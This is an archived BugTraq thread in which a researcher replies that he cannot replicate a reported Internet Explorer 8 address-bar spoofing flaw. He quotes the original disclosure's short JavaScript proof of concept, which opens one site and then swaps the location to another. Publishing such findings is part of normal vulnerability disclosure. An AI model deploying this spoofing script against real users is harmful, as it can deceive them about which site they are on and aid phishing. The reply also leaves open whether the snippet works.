BugTraq
Internet Explorer 8.0 Address Bar Spoofing Vulnerability Jul 24 2010 11:08AM
info securitylab ir (1 replies)
Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability Jul 26 2010 04:30PM
Shreyas Zare (shreyas secfence com)
cant replicate it on my test setup. is something missing?

Shreyas Zare

Sr. Information Security Researcher
Secfence Technologies
www.secfence.com

On Sat, Jul 24, 2010 at 4:38 PM, <info (at) securitylab (dot) ir [email concealed]> wrote:
> Spoof Code:
>
> <script>
> function Spoof() {
>  oc=window.open('http://www.securitylab.ir/', '','location=1');
>  oc.location.replace('http://www.microsoft.com/');
> }
> </script>
> <p align="center">
> <a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
>
>
> Discovered by: Pouya Daneshmand
> http://Securitylab.ir/Advisories
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus